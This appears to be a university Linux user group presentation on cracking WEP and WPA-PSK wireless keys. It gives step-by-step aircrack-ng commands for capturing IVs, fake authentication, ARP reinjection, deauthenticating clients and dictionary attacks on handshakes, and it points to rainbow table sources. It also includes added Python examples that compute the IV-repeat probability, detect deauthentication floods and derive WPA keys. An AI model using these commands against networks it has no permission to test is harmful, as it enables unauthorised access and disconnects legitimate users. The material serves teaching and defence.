
Cracking Wireless

Ryan Curtin
LUG@GT

Ryan Curtin

Cracking Wireless - p. 1

Goals

By the end of this presentation (if you stay awake), you will:
- Understand the different types of wireless keys as well as their advantages and disadvantages
- Understand the legal ramifications of cracking wireless keys
- Have a basic idea of the theory behind the cracking of each key type
- Know how to use software to crack wireless keys


Setting Up

Most of the work can be done with the aircrack-ng package. None of these attacks can be performed if you are using ndiswrapper for your network drivers, or other drivers that do not support promiscuous (or monitor) mode.

Starting / stopping promiscuous mode:

    airmon-ng stop wlan0
    airmon-ng check wlan0
    airmon-ng start wlan0 <channel>


Checking Injection
Before starting, make sure your card can inject packets into an AP!

    aireplay-ng -9 -e <ESSID> -a <MAC> wlan0

Make sure the percentage of ping replies is not incredibly small, otherwise it may be difficult to collect data.


WEP Encryption

The slide title is not redundant! WEP stands for Wired Equivalent Privacy, not wireless encryption protocol.
- 64-bit or 128-bit keys
- Uses the RC4 stream cipher with a CRC-32 checksum
- Keys have a 24-bit IV (initialization vector)
- 2^24 (about 16 million) possible IVs
- 50% probability of a repeated IV after only 5000 packets
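The "50% after 5000 packets" figure is the birthday bound on a 24-bit IV space. The following script (an added example, not part of the slides) computes that probability exactly and finds the packet count at which it crosses 50%, assuming each packet draws its IV uniformly at random.

```python
# Added example: birthday-bound probability that a 24-bit WEP IV repeats within
# n packets. Assumes IVs are drawn uniformly at random; real cards that use a
# simple counter repeat differently (a counter reset repeats from the start).
import math

IV_BITS = 24
IV_SPACE = 1 << IV_BITS  # 2^24 = 16,777,216 possible IVs


def iv_repeat_probability(packets: int, iv_space: int = IV_SPACE) -> float:
    """Exact probability that at least one IV value is reused among `packets`
    packets: 1 - prod_{i=0}^{n-1} (iv_space - i) / iv_space.
    Computed in log space so the product does not underflow."""
    if packets > iv_space:
        return 1.0  # pigeonhole: more packets than IVs guarantees a repeat
    log_no_repeat = 0.0
    for i in range(packets):
        log_no_repeat += math.log1p(-i / iv_space)
    return 1.0 - math.exp(log_no_repeat)


def packets_for_probability(target: float, iv_space: int = IV_SPACE) -> int:
    """Smallest packet count at which the repeat probability reaches `target`.
    Starts from the closed-form approximation n ~ sqrt(2 N ln(1/(1-p)))
    and then refines against the exact formula."""
    n = max(1, int(math.sqrt(2 * iv_space * math.log(1 / (1 - target)))))
    while iv_repeat_probability(n, iv_space) < target:
        n += 1
    while n > 1 and iv_repeat_probability(n - 1, iv_space) >= target:
        n -= 1
    return n


if __name__ == "__main__":
    for n in (1000, 5000, 10000, 50000):
        print(f"{n:6d} packets -> P(IV repeat) = {iv_repeat_probability(n):.3f}")
    print("50% reached at", packets_for_probability(0.5), "packets")
```

With 50k IVs captured (the target given on the later slide), the repeat probability is indistinguishable from 1, which is why keystream reuse is unavoidable in WEP.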


Cracking WEP

Different methods have been developed:
- 2001: Fluhrer, Mantin, and Shamir publish WEP flaws and a passive attack
- 2005: FBI demonstrates WEP cracking in three minutes
- 2006: Bittau, Handley, and Lackey show that active attacks are possible
- 2007: Pyshkin, Tews, and Weinmann optimize the active attack (PTW attack)


Using aircrack-ng

1. Gather important data: access point MAC, ESSID, channel

    airodump-ng wlan0

2. Start capture of IVs

    airodump-ng -c <channel> --bssid <MAC> -w <outputfile> wlan0

   Leave this running! You want to capture around 50k IVs to ensure success (maybe more).

3. Fake authentication with the AP

    aireplay-ng -1 0 -e <ESSID> -a <MAC> wlan0


Using aircrack-ng (2)

4. Reinject ARP packets to get more IVs

    aireplay-ng -3 -b <MAC> wlan0

   Run until you have a substantial number of IVs (in your airodump-ng process).

5. Crack the key!

   FMS attacks (slow):

    aircrack-ng -f 1 -F <capture>.cap

   PTW attacks (fast!):

    aircrack-ng -P 2 <capture>.cap


WPA Encryption

WPA with TKIP appeared as an interim solution to the WEP problem while 802.11i was prepared; 802.11i is WPA2.
- WPA: Wi-Fi Protected Access
- TKIP: Temporal Key Integrity Protocol
- TKIP also uses the RC4 cipher (for legacy WEP hardware)
- Use AES instead if possible!
- IV length increased to 48 bits
- WPA-PSK (pre-shared key): the common consumer environment setup


Cracking WPA-PSK

The WPA-PSK key setup is reproducible: the same passphrase, network name and handshake values always yield the same keys.

Therefore, we must capture a WPA handshake and then try to replicate it offline with candidate passphrases.


Using aircrack-ng

1. Gather important data: access point MAC, ESSID, channel; optional: MAC of a connected client

    airodump-ng wlan0

2. Start capture of handshakes

    airodump-ng -c <channel> --bssid <MAC> -w <outputfile> wlan0

   Leave this running! Watch for "WPA handshake: xx:xx:xx:xx:xx:xx" in the airodump-ng output.

3. (Optional) Fake deauthentication of the client to trigger a handshake

    aireplay-ng -0 1 -a <AP MAC> -c <client MAC> wlan0

   Watch for a successful ACK in the program output.

4. Brute-force attack on the saved handshake

    aircrack-ng -w <dictionary> -b <MAC> <output capture>
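From the network owner's side, the deauthentication in step 3 is the most visible part of this procedure: a wireless IDS watches for bursts of deauthentication frames that a normal AP would never send. The following detector is an added example (not from the slides or the aircrack-ng project); the frame records and MAC addresses are constructed for the example and stand in for what a monitor-mode capture would expose.

```python
# Added example: minimal wireless-IDS check that flags deauthentication floods
# like those produced by "aireplay-ng -0". Frames are dicts with the fields a
# monitor-mode capture exposes; the sample frames below are constructed.
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 0xC   # 802.11 management frame subtype 12 = Deauthentication
BEACON_SUBTYPE = 0x8   # subtype 8 = Beacon (only used for the sample capture)


def detect_deauth_floods(frames, threshold=5, window=1.0):
    """Return one alert per (source, destination) pair that sends more than
    `threshold` deauthentication frames inside any `window`-second span.
    `frames` is an iterable of dicts ordered by `ts`, each with keys
    ts (seconds), subtype (int), src and dst (MAC strings)."""
    recent = defaultdict(deque)   # (src, dst) -> deauth timestamps in window
    alerted = set()
    alerts = []
    for f in frames:
        if f["subtype"] != DEAUTH_SUBTYPE:
            continue
        key = (f["src"], f["dst"])
        q = recent[key]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window:   # drop frames older than window
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": key[0], "dst": key[1], "count": len(q),
                           "first_ts": q[0], "last_ts": f["ts"]})
    return alerts


# Constructed sample capture: a beacon, one legitimate deauth from the AP, then
# a burst of spoofed deauths claiming to come from the AP towards one client.
AP = "00:11:22:33:44:55"          # constructed AP MAC
CLIENT = "66:77:88:99:aa:bb"      # constructed client MAC
SAMPLE_FRAMES = (
    [{"ts": 0.0, "subtype": BEACON_SUBTYPE, "src": AP, "dst": "ff:ff:ff:ff:ff:ff"}]
    + [{"ts": 1.0, "subtype": DEAUTH_SUBTYPE, "src": AP, "dst": CLIENT}]
    + [{"ts": 10.0 + i * 0.01, "subtype": DEAUTH_SUBTYPE, "src": AP, "dst": CLIENT}
       for i in range(64)]
)

if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"deauth flood {a['src']} -> {a['dst']}: {a['count']} frames "
              f"in {a['last_ts'] - a['first_ts']:.2f}s")
```

A single deauthentication (the AP dropping an idle client) stays below the threshold; only the burst raises an alert, and the alert names the spoofed source so the real AP's logs can be checked.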


Rainbow Tables

Rainbow Tables: a giant collection of potential common passphrases. Available from:
- Church of WiFi Rainbow Tables: http://www.renderlab.net/projects/WPA-tables/
- The Shmoo Group: http://rainbowtables.shmoo.com/
- Google Search: http://www.google.com/#q=wpa+rainbow+tables
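Both the "reproducible key setup" point on the Cracking WPA-PSK slide and the usefulness of precomputed tables come down to one derivation: the passphrase and the SSID are turned into the 256-bit pairwise master key with PBKDF2. The script below is an added example (not from the slides) that performs that derivation; the SSID names other than the IEEE test vector are constructed for the example.

```python
# Added example: how a WPA-PSK passphrase becomes the pairwise master key (PMK).
# The SSID is the PBKDF2 salt, so a precomputed table is only valid for the SSID
# it was built with; a network with an uncommon SSID defeats off-the-shelf tables.
import hashlib
import time


def wpa_psk_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes),
    as specified for WPA/WPA2-Personal."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA-PSK passphrases are 8..63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def pmk_depends_on_ssid(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when the same passphrase yields different PMKs on two SSIDs."""
    return wpa_psk_pmk(passphrase, ssid_a) != wpa_psk_pmk(passphrase, ssid_b)


def derivations_per_second(samples: int = 20) -> float:
    """Rough single-core rate of PMK derivations. Every candidate passphrase in
    a dictionary attack costs one of these, which is why tables are precomputed
    per SSID instead of being derived on the fly."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_psk_pmk(f"candidate{i:04d}", "ExampleNet")   # constructed SSID
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
    print("PMK(password, IEEE) =", wpa_psk_pmk("password", "IEEE").hex())
    changed = pmk_depends_on_ssid("password", "IEEE", "linksys")
    print("same passphrase, different SSID ->",
          "different PMK" if changed else "same PMK")
    print(f"~{derivations_per_second():.0f} PMK derivations/s on this machine")
```

The defensive reading is the same as the offensive one: a table built for a default SSID such as "linksys" is worthless against a network with a unique SSID, and a long random passphrase is outside any table regardless of SSID.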


Questions and Comments?


